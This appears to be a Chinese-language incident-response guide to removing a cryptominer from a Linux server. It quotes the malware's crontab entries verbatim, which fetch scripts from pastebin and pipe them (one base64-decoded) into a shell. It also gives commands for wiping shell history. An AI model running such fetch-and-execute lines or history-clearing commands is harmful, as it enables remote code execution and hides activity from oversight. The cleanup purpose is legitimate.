查看哪個進程占據cup
通過 top 或者使用 ps aux
我這個通過top 命令看不到哪個進程占用了cup ,執行 cat /etc/ld.so.preload 查看,里面也加載了異常的文件,判斷是用於隱藏進程用的, 建議將其內容注釋掉或刪除,執行ldconfig 然后再使用top 查看下進程; 使用 ls -lt /etc | head 查看最近變動的文件目錄 或者使用 find 命令 查找最近修改過的文件
查找進程文件刪除,執行其中任意 1 條命令即可
ps -ef | grep shutdown [命令]
ps aux | grep /bin/bash [命令路徑]
ps aux | grep bash [命令]
lsof -p PID
cd /proc/4170 [pid]
ps aux 輸出格式 :
root 14232 0.0 0.0 5928 724 pts/1 S+ 18:16 0:00 grep ./update_stock USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND 格式說明: USER: 行程擁有者 PID: pid %CPU: 占用的 CPU 使用率 %MEM: 占用的記憶體使用率 VSZ: 占用的虛擬記憶體大小 RSS: 占用的記憶體大小 TTY: 終端的次要裝置號碼 (minor number of tty) STAT: 該行程的狀態,linux的進程有5種狀態: D 不可中斷 uninterruptible sleep (usually IO) R 運行 runnable (on run queue) S 中斷 sleeping T 停止 traced or stopped Z 僵死 a defunct (”zombie”) process 注: 其它狀態還包括W(無駐留頁), <(高優先級進程), N(低優先級進程), L(內存鎖頁). START: 行程開始時間 TIME: 執行的時間 COMMAND:所執行的指令
找出系統中所有的僵屍進程
ps aux | grep 'defunct'
或
ps -ef | grep defunct | grep -v grep | wc -l
清理僵屍進程
ps -e -o ppid,stat | grep Z | cut -d" " -f2 | xargs kill -9
或
kill -HUP `ps -A -ostat,ppid | grep -e '^[Zz]' | awk '{print $2}'`
查找系統中的定時任務
crontab -l
或者
cd /var/spool/cron #查看這個文件夾下的文件刪除
vim /etc/crontab
里面會有一個定時任務我的分別是一下這幾個(刪除), 瀏覽器打開網址是個腳本,通過base64 加密,解密即可看到腳本內容
* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh */1 * * * root /bin/sh /bin/httpdns /usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash
根據腳本刪除腳本創建的文件,我這里刪除的是
/usr/local/lib/libjdk.so ,/etc/ld.so.preload
查看系統登錄日志
日志文件 /var/log/wtmp ,系統的每一次登錄,都會在此日志中添加記錄,為了防止有人篡改,該文件為二進制文件
cd /var/log ; last 或者 last -f /var/log/wtmp
刪除歷史操作命令,防止黑客進入查看你做了哪些操作
history 命令來查看歷史命令
history -c 是清除當前shell的歷史紀錄,因為系統一般會把信息保存在一個文件中,只要文件中內容沒有改變,那么信息也不會變。linux中存放歷史命令的文件是.bash_history,清空該文件(echo ‘’ > /root/.bash_history),那些歷史命令就會被清空了。
如果是在shell腳本中調用 history -c 清空當前shell的歷史命令,是不會成功的,因為bash執行命令時默認是會產生一個子進程來執行該命令,在子進程中執行 history -c 不是清除你當前shell的歷史命令了。可以使用source來執行腳本(source ./腳本),source 指在當前bash環境下執行命令。
關閉不需要的端口
屏蔽訪問腳本中的域名 ip,關閉訪問挖礦服務器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
如果安裝了redis ,修改redis 端口,設置復雜高一些密碼 Redis 未授權訪問缺陷可輕易導致系統被黑